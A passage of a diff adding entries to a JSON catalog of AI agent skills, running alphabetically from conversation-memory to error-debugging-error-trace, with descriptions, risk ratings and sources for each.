+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conversation-memory",
+ "path": "skills/conversation-memory",
+ "category": "uncategorized",
+ "name": "conversation-memory",
+ "description": "Persistent memory systems for LLM conversations including short-term, long-term, and entity-based memory Use when: conversation memory, remember, memory persistence, long-term memory, chat history.",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "convertkit-automation",
+ "path": "skills/convertkit-automation",
+ "category": "uncategorized",
+ "name": "convertkit-automation",
+ "description": "Automate ConvertKit (Kit) tasks via Rube MCP (Composio): manage subscribers, tags, broadcasts, and broadcast stats. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "convex",
+ "path": "skills/convex",
+ "category": "uncategorized",
+ "name": "convex",
+ "description": "Convex reactive backend expert: schema design, TypeScript functions, real-time subscriptions, auth, file storage, scheduling, and deployment.",
+ "risk": "safe",
+ "source": "https://docs.convex.dev",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "copilot-sdk",
+ "path": "skills/copilot-sdk",
+ "category": "uncategorized",
+ "name": "copilot-sdk",
+ "description": "Build applications powered by GitHub Copilot using the Copilot SDK. Use when creating programmatic integrations with Copilot across Node.js/TypeScript, Python, Go, or .NET. Covers session managemen...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "copy-editing",
+ "path": "skills/copy-editing",
+ "category": "uncategorized",
+ "name": "copy-editing",
+ "description": "When the user wants to edit, review, or improve existing marketing copy. Also use when the user mentions 'edit this copy,' 'review my copy,' 'copy feedback,' 'proofread,' 'polish this,' 'make this ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "copywriting",
+ "path": "skills/copywriting",
+ "category": "uncategorized",
+ "name": "copywriting",
+ "description": "Write rigorous, conversion-focused marketing copy for landing pages and emails. Enforces brief confirmation and strict no-fabrication rules.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "core-components",
+ "path": "skills/core-components",
+ "category": "uncategorized",
+ "name": "core-components",
+ "description": "Core component library and design system patterns. Use when building UI, using design tokens, or working with the component library.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cost-optimization",
+ "path": "skills/cost-optimization",
+ "category": "uncategorized",
+ "name": "cost-optimization",
+ "description": "Optimize cloud costs through resource rightsizing, tagging strategies, reserved instances, and spending analysis. Use when reducing cloud expenses, analyzing infrastructure costs, or implementing c...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cpp-pro",
+ "path": "skills/cpp-pro",
+ "category": "uncategorized",
+ "name": "cpp-pro",
+ "description": "Write idiomatic C++ code with modern features, RAII, smart pointers, and STL algorithms. Handles templates, move semantics, and performance optimization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cqrs-implementation",
+ "path": "skills/cqrs-implementation",
+ "category": "uncategorized",
+ "name": "cqrs-implementation",
+ "description": "Implement Command Query Responsibility Segregation for scalable architectures. Use when separating read and write models, optimizing query performance, or building event-sourced systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "create-pr",
+ "path": "skills/create-pr",
+ "category": "uncategorized",
+ "name": "create-pr",
+ "description": "Create pull requests following Sentry conventions. Use when opening PRs, writing PR descriptions, or preparing changes for review. Follows Sentry's code review guidelines.",
+ "risk": "safe",
+ "source": "https://github.com/getsentry/skills/tree/main/plugins/sentry-skills/skills/create-pr",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "crewai",
+ "path": "skills/crewai",
+ "category": "uncategorized",
+ "name": "crewai",
+ "description": "Expert in CrewAI - the leading role-based multi-agent framework used by 60% of Fortune 500 companies. Covers agent design with roles and goals, task definition, crew orchestration, process types (s...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "crypto-bd-agent",
+ "path": "skills/crypto-bd-agent",
+ "category": "uncategorized",
+ "name": "crypto-bd-agent",
+ "description": "Autonomous crypto business development patterns \u2014 multi-chain token discovery, 100-point scoring with wallet forensics, x402 micropayments, ERC-8004 on-chain identity, LLM cascade routing, and...",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "csharp-pro",
+ "path": "skills/csharp-pro",
+ "category": "uncategorized",
+ "name": "csharp-pro",
+ "description": "Write modern C# code with advanced features like records, pattern matching, and async/await. Optimizes .NET applications, implements enterprise patterns, and ensures comprehensive testing.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "culture-index",
+ "path": "skills/culture-index",
+ "category": "uncategorized",
+ "name": "culture-index",
+ "description": "Index and search culture documentation",
+ "risk": "safe",
+ "source": "https://github.com/trailofbits/skills/tree/main/plugins/culture-index",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "customer-support",
+ "path": "skills/customer-support",
+ "category": "uncategorized",
+ "name": "customer-support",
+ "description": "Elite AI-powered customer support specialist mastering conversational AI, automated ticketing, sentiment analysis, and omnichannel support experiences.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "customs-trade-compliance",
+ "path": "skills/customs-trade-compliance",
+ "category": "uncategorized",
+ "name": "customs-trade-compliance",
+ "description": "Codified expertise for customs documentation, tariff classification, duty optimisation, restricted party screening, and regulatory compliance across multiple jurisdictions.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "daily-news-report",
+ "path": "skills/daily-news-report",
+ "category": "uncategorized",
+ "name": "daily-news-report",
+ "description": "Scrapes content based on a preset URL list, filters high-quality technical information, and generates daily Markdown reports.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "data-engineer",
+ "path": "skills/data-engineer",
+ "category": "uncategorized",
+ "name": "data-engineer",
+ "description": "Build scalable data pipelines, modern data warehouses, and real-time streaming architectures. Implements Apache Spark, dbt, Airflow, and cloud-native data platforms.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "data-engineering-data-driven-feature",
+ "path": "skills/data-engineering-data-driven-feature",
+ "category": "uncategorized",
+ "name": "data-engineering-data-driven-feature",
+ "description": "Build features guided by data insights, A/B testing, and continuous measurement using specialized agents for analysis, implementation, and experimentation.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "data-engineering-data-pipeline",
+ "path": "skills/data-engineering-data-pipeline",
+ "category": "uncategorized",
+ "name": "data-engineering-data-pipeline",
+ "description": "You are a data pipeline architecture expert specializing in scalable, reliable, and cost-effective data pipelines for batch and streaming data processing.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "data-quality-frameworks",
+ "path": "skills/data-quality-frameworks",
+ "category": "uncategorized",
+ "name": "data-quality-frameworks",
+ "description": "Implement data quality validation with Great Expectations, dbt tests, and data contracts. Use when building data quality pipelines, implementing validation rules, or establishing data contracts.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "data-scientist",
+ "path": "skills/data-scientist",
+ "category": "uncategorized",
+ "name": "data-scientist",
+ "description": "Expert data scientist for advanced analytics, machine learning, and statistical modeling. Handles complex data analysis, predictive modeling, and business intelligence.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "data-storytelling",
+ "path": "skills/data-storytelling",
+ "category": "uncategorized",
+ "name": "data-storytelling",
+ "description": "Transform data into compelling narratives using visualization, context, and persuasive structure. Use when presenting analytics to stakeholders, creating data reports, or building executive present...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "data-structure-protocol",
+ "path": "skills/data-structure-protocol",
+ "category": "uncategorized",
+ "name": "data-structure-protocol",
+ "description": "Give agents persistent structural memory of a codebase \u2014 navigate dependencies, track public APIs, and understand why connections exist without re-reading the whole repo.",
+ "risk": "safe",
+ "source": "https://github.com/k-kolomeitsev/data-structure-protocol",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database",
+ "path": "skills/database",
+ "category": "workflow-bundle",
+ "name": "database",
+ "description": "Database development and operations workflow covering SQL, NoSQL, database design, migrations, optimization, and data engineering.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-admin",
+ "path": "skills/database-admin",
+ "category": "uncategorized",
+ "name": "database-admin",
+ "description": "Expert database administrator specializing in modern cloud databases, automation, and reliability engineering.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-architect",
+ "path": "skills/database-architect",
+ "category": "uncategorized",
+ "name": "database-architect",
+ "description": "Expert database architect specializing in data layer design from scratch, technology selection, schema modeling, and scalable database architectures.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-cloud-optimization-cost-optimize",
+ "path": "skills/database-cloud-optimization-cost-optimize",
+ "category": "uncategorized",
+ "name": "database-cloud-optimization-cost-optimize",
+ "description": "You are a cloud cost optimization expert specializing in reducing infrastructure expenses while maintaining performance and reliability. Analyze cloud spending, identify savings opportunities, and ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-design",
+ "path": "skills/database-design",
+ "category": "uncategorized",
+ "name": "database-design",
+ "description": "Database design principles and decision-making. Schema design, indexing strategy, ORM selection, serverless databases.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-migration",
+ "path": "skills/database-migration",
+ "category": "uncategorized",
+ "name": "database-migration",
+ "description": "Execute database migrations across ORMs and platforms with zero-downtime strategies, data transformation, and rollback procedures. Use when migrating databases, changing schemas, performing data tr...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-migrations-migration-observability",
+ "path": "skills/database-migrations-migration-observability",
+ "category": "uncategorized",
+ "name": "database-migrations-migration-observability",
+ "description": "Migration monitoring, CDC, and observability infrastructure",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-migrations-sql-migrations",
+ "path": "skills/database-migrations-sql-migrations",
+ "category": "uncategorized",
+ "name": "database-migrations-sql-migrations",
+ "description": "SQL database migrations with zero-downtime strategies for PostgreSQL, MySQL, and SQL Server. Focus on data integrity and rollback plans.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "database-optimizer",
+ "path": "skills/database-optimizer",
+ "category": "uncategorized",
+ "name": "database-optimizer",
+ "description": "Expert database optimizer specializing in modern performance tuning, query optimization, and scalable architectures.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "datadog-automation",
+ "path": "skills/datadog-automation",
+ "category": "uncategorized",
+ "name": "datadog-automation",
+ "description": "Automate Datadog tasks via Rube MCP (Composio): query metrics, search logs, manage monitors/dashboards, create events and downtimes. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dbos-golang",
+ "path": "skills/dbos-golang",
+ "category": "uncategorized",
+ "name": "dbos-golang",
+ "description": "DBOS Go SDK for building reliable, fault-tolerant applications with durable workflows. Use this skill when writing Go code with DBOS, creating workflows and steps, using queues, using the DBOS Clie...",
+ "risk": "safe",
+ "source": "https://docs.dbos.dev/",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dbos-python",
+ "path": "skills/dbos-python",
+ "category": "uncategorized",
+ "name": "dbos-python",
+ "description": "DBOS Python SDK for building reliable, fault-tolerant applications with durable workflows. Use this skill when writing Python code with DBOS, creating workflows and steps, using queues, using DBOSC...",
+ "risk": "safe",
+ "source": "https://docs.dbos.dev/",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dbos-typescript",
+ "path": "skills/dbos-typescript",
+ "category": "uncategorized",
+ "name": "dbos-typescript",
+ "description": "DBOS TypeScript SDK for building reliable, fault-tolerant applications with durable workflows. Use this skill when writing TypeScript code with DBOS, creating workflows and steps, using queues, usi...",
+ "risk": "safe",
+ "source": "https://docs.dbos.dev/",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dbt-transformation-patterns",
+ "path": "skills/dbt-transformation-patterns",
+ "category": "uncategorized",
+ "name": "dbt-transformation-patterns",
+ "description": "Master dbt (data build tool) for analytics engineering with model organization, testing, documentation, and incremental strategies. Use when building data transformations, creating data models, or ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ddd-context-mapping",
+ "path": "skills/ddd-context-mapping",
+ "category": "uncategorized",
+ "name": "ddd-context-mapping",
+ "description": "Map relationships between bounded contexts and define integration contracts using DDD context mapping patterns.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ddd-strategic-design",
+ "path": "skills/ddd-strategic-design",
+ "category": "uncategorized",
+ "name": "ddd-strategic-design",
+ "description": "Design DDD strategic artifacts including subdomains, bounded contexts, and ubiquitous language for complex business domains.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ddd-tactical-patterns",
+ "path": "skills/ddd-tactical-patterns",
+ "category": "uncategorized",
+ "name": "ddd-tactical-patterns",
+ "description": "Apply DDD tactical patterns in code using entities, value objects, aggregates, repositories, and domain events with explicit invariants.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "debugger",
+ "path": "skills/debugger",
+ "category": "uncategorized",
+ "name": "debugger",
+ "description": "Debugging specialist for errors, test failures, and unexpected\nbehavior. Use proactively when encountering any issues.\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "debugging-strategies",
+ "path": "skills/debugging-strategies",
+ "category": "uncategorized",
+ "name": "debugging-strategies",
+ "description": "Master systematic debugging techniques, profiling tools, and root cause analysis to efficiently track down bugs across any codebase or technology stack. Use when investigating bugs, performance iss...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "debugging-toolkit-smart-debug",
+ "path": "skills/debugging-toolkit-smart-debug",
+ "category": "uncategorized",
+ "name": "debugging-toolkit-smart-debug",
+ "description": "Use when working with debugging toolkit smart debug",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "deep-research",
+ "path": "skills/deep-research",
+ "category": "uncategorized",
+ "name": "deep-research",
+ "description": "Execute autonomous multi-step research using Google Gemini Deep Research Agent. Use for: market analysis, competitive landscaping, literature reviews, technical research, due diligence. Takes 2-10 ...",
+ "risk": "safe",
+ "source": "https://github.com/sanjay3290/ai-skills/tree/main/skills/deep-research",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "defi-protocol-templates",
+ "path": "skills/defi-protocol-templates",
+ "category": "uncategorized",
+ "name": "defi-protocol-templates",
+ "description": "Implement DeFi protocols with production-ready templates for staking, AMMs, governance, and lending systems. Use when building decentralized finance applications or smart contract protocols.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dependency-management-deps-audit",
+ "path": "skills/dependency-management-deps-audit",
+ "category": "uncategorized",
+ "name": "dependency-management-deps-audit",
+ "description": "You are a dependency security expert specializing in vulnerability scanning, license compliance, and supply chain security. Analyze project dependencies for known vulnerabilities, licensing issues,...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dependency-upgrade",
+ "path": "skills/dependency-upgrade",
+ "category": "uncategorized",
+ "name": "dependency-upgrade",
+ "description": "Manage major dependency version upgrades with compatibility analysis, staged rollout, and comprehensive testing. Use when upgrading framework versions, updating major dependencies, or managing brea...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "deployment-engineer",
+ "path": "skills/deployment-engineer",
+ "category": "uncategorized",
+ "name": "deployment-engineer",
+ "description": "Expert deployment engineer specializing in modern CI/CD pipelines, GitOps workflows, and advanced deployment automation.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "deployment-pipeline-design",
+ "path": "skills/deployment-pipeline-design",
+ "category": "uncategorized",
+ "name": "deployment-pipeline-design",
+ "description": "Design multi-stage CI/CD pipelines with approval gates, security checks, and deployment orchestration. Use when architecting deployment workflows, setting up continuous delivery, or implementing Gi...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "deployment-procedures",
+ "path": "skills/deployment-procedures",
+ "category": "uncategorized",
+ "name": "deployment-procedures",
+ "description": "Production deployment principles and decision-making. Safe deployment workflows, rollback strategies, and verification. Teaches thinking, not scripts.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "deployment-validation-config-validate",
+ "path": "skills/deployment-validation-config-validate",
+ "category": "uncategorized",
+ "name": "deployment-validation-config-validate",
+ "description": "You are a configuration management expert specializing in validating, testing, and ensuring the correctness of application configurations. Create comprehensive validation schemas, implement configurat",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "design-md",
+ "path": "skills/design-md",
+ "category": "uncategorized",
+ "name": "design-md",
+ "description": "Analyze Stitch projects and synthesize a semantic design system into DESIGN.md files",
+ "risk": "safe",
+ "source": "https://github.com/google-labs-code/stitch-skills/tree/main/skills/design-md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "design-orchestration",
+ "path": "skills/design-orchestration",
+ "category": "uncategorized",
+ "name": "design-orchestration",
+ "description": "Orchestrates design workflows by routing work through brainstorming, multi-agent review, and execution readiness in the correct order.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "development",
+ "path": "skills/development",
+ "category": "workflow-bundle",
+ "name": "development",
+ "description": "Comprehensive web, mobile, and backend development workflow bundling frontend, backend, full-stack, and mobile development skills for end-to-end application delivery.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "devops-troubleshooter",
+ "path": "skills/devops-troubleshooter",
+ "category": "uncategorized",
+ "name": "devops-troubleshooter",
+ "description": "Expert DevOps troubleshooter specializing in rapid incident response, advanced debugging, and modern observability.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "discord-automation",
+ "path": "skills/discord-automation",
+ "category": "uncategorized",
+ "name": "discord-automation",
+ "description": "Automate Discord tasks via Rube MCP (Composio): messages, channels, roles, webhooks, reactions. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "discord-bot-architect",
+ "path": "skills/discord-bot-architect",
+ "category": "uncategorized",
+ "name": "discord-bot-architect",
+ "description": "Specialized skill for building production-ready Discord bots. Covers Discord.js (JavaScript) and Pycord (Python), gateway intents, slash commands, interactive components, rate limiting, and sharding.",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dispatching-parallel-agents",
+ "path": "skills/dispatching-parallel-agents",
+ "category": "uncategorized",
+ "name": "dispatching-parallel-agents",
+ "description": "Use when facing 2+ independent tasks that can be worked on without shared state or sequential dependencies",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "distributed-debugging-debug-trace",
+ "path": "skills/distributed-debugging-debug-trace",
+ "category": "uncategorized",
+ "name": "distributed-debugging-debug-trace",
+ "description": "You are a debugging expert specializing in setting up comprehensive debugging environments, distributed tracing, and diagnostic tools. Configure debugging workflows, implement tracing solutions, an...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "distributed-tracing",
+ "path": "skills/distributed-tracing",
+ "category": "uncategorized",
+ "name": "distributed-tracing",
+ "description": "Implement distributed tracing with Jaeger and Tempo to track requests across microservices and identify performance bottlenecks. Use when debugging microservices, analyzing request flows, or implem...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "django-pro",
+ "path": "skills/django-pro",
+ "category": "uncategorized",
+ "name": "django-pro",
+ "description": "Master Django 5.x with async views, DRF, Celery, and Django Channels. Build scalable web applications with proper architecture, testing, and deployment.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "doc-coauthoring",
+ "path": "skills/doc-coauthoring",
+ "category": "uncategorized",
+ "name": "doc-coauthoring",
+ "description": "Guide users through a structured workflow for co-authoring documentation. Use when user wants to write documentation, proposals, technical specs, decision docs, or similar structured content. This ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "docker-expert",
+ "path": "skills/docker-expert",
+ "category": "devops",
+ "name": "docker-expert",
+ "description": "Docker containerization expert with deep knowledge of multi-stage builds, image optimization, container security, Docker Compose orchestration, and production deployment patterns. Use PROACTIVELY f...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "docs-architect",
+ "path": "skills/docs-architect",
+ "category": "uncategorized",
+ "name": "docs-architect",
+ "description": "Creates comprehensive technical documentation from existing codebases. Analyzes architecture, design patterns, and implementation details to produce long-form technical manuals and ebooks.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "documentation",
+ "path": "skills/documentation",
+ "category": "workflow-bundle",
+ "name": "documentation",
+ "description": "Documentation generation workflow covering API docs, architecture docs, README files, code comments, and technical writing.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "documentation-generation-doc-generate",
+ "path": "skills/documentation-generation-doc-generate",
+ "category": "uncategorized",
+ "name": "documentation-generation-doc-generate",
+ "description": "You are a documentation expert specializing in creating comprehensive, maintainable documentation from code. Generate API docs, architecture diagrams, user guides, and technical references using AI...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "documentation-templates",
+ "path": "skills/documentation-templates",
+ "category": "uncategorized",
+ "name": "documentation-templates",
+ "description": "Documentation templates and structure guidelines. README, API docs, code comments, and AI-friendly documentation.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "docusign-automation",
+ "path": "skills/docusign-automation",
+ "category": "uncategorized",
+ "name": "docusign-automation",
+ "description": "Automate DocuSign tasks via Rube MCP (Composio): templates, envelopes, signatures, document management. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "docx-official",
+ "path": "skills/docx-official",
+ "category": "uncategorized",
+ "name": "docx-official",
+ "description": "Comprehensive document creation, editing, and analysis with support for tracked changes, comments, formatting preservation, and text extraction. When Claude needs to work with professional document...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "domain-driven-design",
+ "path": "skills/domain-driven-design",
+ "category": "uncategorized",
+ "name": "domain-driven-design",
+ "description": "Plan and route Domain-Driven Design work from strategic modeling to tactical implementation and evented architecture patterns.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dotnet-architect",
+ "path": "skills/dotnet-architect",
+ "category": "uncategorized",
+ "name": "dotnet-architect",
+ "description": "Expert .NET backend architect specializing in C#, ASP.NET Core, Entity Framework, Dapper, and enterprise application patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dotnet-backend",
+ "path": "skills/dotnet-backend",
+ "category": "uncategorized",
+ "name": "dotnet-backend",
+ "description": "Build ASP.NET Core 8+ backend services with EF Core, auth, background jobs, and production API patterns.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dotnet-backend-patterns",
+ "path": "skills/dotnet-backend-patterns",
+ "category": "uncategorized",
+ "name": "dotnet-backend-patterns",
+ "description": "Master C#/.NET backend development patterns for building robust APIs, MCP servers, and enterprise applications. Covers async/await, dependency injection, Entity Framework Core, Dapper, configuratio...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "draw",
+ "path": "skills/libreoffice/draw",
+ "category": "graphics-processing",
+ "name": "draw",
+ "description": "Vector graphics and diagram creation, format conversion (ODG/SVG/PDF) with LibreOffice Draw.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dropbox-automation",
+ "path": "skills/dropbox-automation",
+ "category": "uncategorized",
+ "name": "dropbox-automation",
+ "description": "Automate Dropbox file management, sharing, search, uploads, downloads, and folder operations via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "dx-optimizer",
+ "path": "skills/dx-optimizer",
+ "category": "uncategorized",
+ "name": "dx-optimizer",
+ "description": "Developer Experience specialist. Improves tooling, setup, and workflows. Use PROACTIVELY when setting up new projects, after team feedback, or when development friction is noticed.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "e2e-testing",
+ "path": "skills/e2e-testing",
+ "category": "granular-workflow-bundle",
+ "name": "e2e-testing",
+ "description": "End-to-end testing workflow with Playwright for browser automation, visual regression, cross-browser testing, and CI/CD integration.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "e2e-testing-patterns",
+ "path": "skills/e2e-testing-patterns",
+ "category": "uncategorized",
+ "name": "e2e-testing-patterns",
+ "description": "Master end-to-end testing with Playwright and Cypress to build reliable test suites that catch bugs, improve confidence, and enable fast deployment. Use when implementing E2E tests, debugging flaky...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "elixir-pro",
+ "path": "skills/elixir-pro",
+ "category": "uncategorized",
+ "name": "elixir-pro",
+ "description": "Write idiomatic Elixir code with OTP patterns, supervision trees, and Phoenix LiveView. Masters concurrency, fault tolerance, and distributed systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "email-sequence",
+ "path": "skills/email-sequence",
+ "category": "uncategorized",
+ "name": "email-sequence",
+ "description": "When the user wants to create or optimize an email sequence, drip campaign, automated email flow, or lifecycle email program. Also use when the user mentions \"email sequence,\" \"drip campa...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "email-systems",
+ "path": "skills/email-systems",
+ "category": "uncategorized",
+ "name": "email-systems",
+ "description": "Email has the highest ROI of any marketing channel. $36 for every $1 spent. Yet most startups treat it as an afterthought - bulk blasts, no personalization, landing in spam folders. This skill cov...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "embedding-strategies",
+ "path": "skills/embedding-strategies",
+ "category": "uncategorized",
+ "name": "embedding-strategies",
+ "description": "Select and optimize embedding models for semantic search and RAG applications. Use when choosing embedding models, implementing chunking strategies, or optimizing embedding quality for specific dom...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "employment-contract-templates",
+ "path": "skills/employment-contract-templates",
+ "category": "uncategorized",
+ "name": "employment-contract-templates",
+ "description": "Create employment contracts, offer letters, and HR policy documents following legal best practices. Use when drafting employment agreements, creating HR policies, or standardizing employment docume...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "energy-procurement",
+ "path": "skills/energy-procurement",
+ "category": "uncategorized",
+ "name": "energy-procurement",
+ "description": "Codified expertise for electricity and gas procurement, tariff optimisation, demand charge management, renewable PPA evaluation, and multi-facility energy cost management.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "environment-setup-guide",
+ "path": "skills/environment-setup-guide",
+ "category": "uncategorized",
+ "name": "environment-setup-guide",
+ "description": "Guide developers through setting up development environments with proper tools, dependencies, and configurations",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-debugging-error-analysis",
+ "path": "skills/error-debugging-error-analysis",
+ "category": "uncategorized",
+ "name": "error-debugging-error-analysis",
+ "description": "You are an expert error analysis specialist with deep expertise in debugging distributed systems, analyzing production incidents, and implementing comprehensive observability solutions.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "error-debugging-error-trace",
+ "path": "skills/error-debugging-error-trace",
+ "category": "uncategorized",
+ "name": "error-debugging-error-trace",
